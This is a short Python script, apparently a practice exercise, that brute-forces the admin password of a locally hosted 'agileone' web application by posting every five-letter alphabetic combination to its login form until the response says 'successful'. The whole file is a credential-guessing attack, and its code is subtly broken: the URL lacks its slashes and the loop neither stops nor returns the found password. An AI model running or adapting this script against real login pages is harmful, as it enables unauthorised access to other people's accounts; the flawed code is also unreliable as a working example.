# -*- coding: utf-8 -*-
# @Time : 2019/2/16 11:45
# @Author : Administrator
# @File : get_pwd.py
# @Project : 暴力破解
# @title : 获取agileone用户admin的登录密码
import string,requests

class GetPass():
    def login(self,pwd):
        res = requests.post(url='http:localhost/agileone/index.php/common/login',
                            data={'username':'admin','password':pwd,'savelogin':'true'})
        if "successful" in res.text:
            return 1
        else:
            return 0

    def test(self):
        word = string.ascii_uppercase + string.ascii_lowercase
        for fir in word:
            for sec in word:
                for thi in word:
                    for fou in word:
                        for fiv in word:
                            pwd = fir+sec+thi+fou+fiv
                            if self.login(pwd) == 1:
                                password = pwd
                                break



if __name__ == '__main__':
    GetPass().test()